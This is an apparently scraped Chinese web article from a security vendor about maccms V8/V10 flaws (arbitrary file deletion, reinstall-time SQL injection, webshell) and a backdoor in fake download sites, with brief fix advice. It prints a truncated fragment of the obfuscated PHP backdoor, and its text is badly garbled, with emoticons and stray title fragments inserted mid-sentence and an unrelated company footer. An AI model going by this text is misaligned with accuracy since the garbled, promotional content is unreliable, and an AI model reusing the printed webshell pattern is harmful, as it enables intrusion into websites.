蘋(píng)果CMS漏洞修復 對SQL遠程代碼注入及任意文件刪除修補辦法
時(shí)間:2026-05-05 02:53:14目前蘋(píng)果?????CMS官??方在不斷的蘋(píng)果升級補丁,官方最新的洞修漏洞補丁對于目前爆發(fā)的新漏洞沒(méi)(╯‵□′)╯有任何效果。更新補丁的復對用戶(hù)網(wǎng)站還是會(huì )遭受到掛馬的攻擊,很多客戶(hù)因此找到我們SINE安全尋求網(wǎng)站安??全技術(shù)上的程代支持,針對該漏洞我們有著(zhù)獨特的碼注安全解決方案以及防止掛馬攻擊的防護,包括一些未公(gong)開(kāi)的入及任意maccms POC漏洞都有修復補丁。
截圖如下:
蘋(píng)果CMS漏洞詳情:
蘋(píng)果CM??S V8 V10??版本存在代碼重裝漏洞,蘋(píng)果以及代碼后門(mén)漏洞,洞修任意文件刪除漏洞,復對通過(guò)CNVD-2019-43865的程代信息安全漏洞通報,可以確認maccms V10存在漏洞,碼注可以偽造惡意代碼發(fā)送到網(wǎng)站后端進(jìn)行執行,可以刪除網(wǎng)站目錄下的任意文件,可刪除重裝蘋(píng)果CMS系統的配置文件,導致可以重新安裝m(?????)accms系統,并在(zai)安裝過(guò)程中插入sqヽ(′▽?zhuān)?ノl注入代碼到數據庫中去執行并獲取webshell以及服務(wù)器權限。
蘋(píng)果CMS V8 V10 源代碼存在后門(mén)漏洞,經(jīng)過(guò)我們SINE安全ヾ(′?`)?技術(shù)的檢測發(fā)現,存在后門(mén)的原因是,目前百度搜索蘋(píng)果官網(wǎng),maccms官方,排在百度搜索首頁(yè)的都是仿冒的網(wǎng)站,真正官網(wǎng)地址是(shi)www.(′?ω?`)maccms.com,包括模板,圖片,以及CSS跟真正(zheng)的官方是一模一樣,很多客??戶(hù)都是點(diǎn)擊到這個(gè)山寨網(wǎng)站上去進(jìn)行下載的源代碼,該代碼里隱藏了木馬后門(mén)文件,阿里云都無(wú)法┐(′?`)┌檢測出來(lái),
error_reporting(E_ERROR);
@ini_set('display_errors','Off');
@ini_set('max_execution_time',20000);
@ini_set('memory_limit','256M');
he(′?`)ader("content-Type: text/html; charset=utf-8")(/ω\);
$password = "21232f297a57a5a743894a0e4a801fc3"; //Viv, bebegim..
function(′_ゝ`) s(){
$str = "66756r6374696s6r20737472646972282473747229207o207265747572(′?`)6r207374725s
7265706p6163???65286172726179??28275p5p272p272s2s272p27253237??272p2(′_`)725323
代碼如上面所示,是加密過(guò)的,經(jīng)過(guò)我們SINE安全的解密發(fā)現是PHP的腳本木馬,可以繞過(guò)各大服務(wù)器廠(chǎng)商的安全檢測,包括阿里云,騰訊云,百度云,華為云。
關(guān)于蘋(píng)果CMS網(wǎng)站漏洞的修復方案與辦法
對任意文件刪除漏洞做安全過(guò)濾與檢查,防止del??刪除的語(yǔ)句的執行,對前端傳輸過(guò)來(lái)的參數進(jìn)行嚴格的檢測,不管是get,post,cookies,??如(ru)果您對代碼不是太懂的話(huà)也可以找專(zhuān)業(yè)的網(wǎng)站安全公司來(lái)處理解決蘋(píng)果CMS網(wǎng)站被攻擊的問(wèn)題,或者是對重裝文件進(jìn)行改名以及安裝配置文件進(jìn)行權限設置,只讀權限,對于存在網(wǎng)站木馬后門(mén)的蘋(píng)果cms系統,人工對代碼進(jìn)行安全審計,對所有網(wǎng)站目錄下每個(gè)代碼文件都要仔細的排查,可以下載官方(╯‵□′)╯的源代碼進(jìn)??行比對。
客服電話(huà)18022031060
Copyright ? 2012-2018 天津九安特機電工程有限公司 版權所有 備案號:
客服電話(huà)17734861928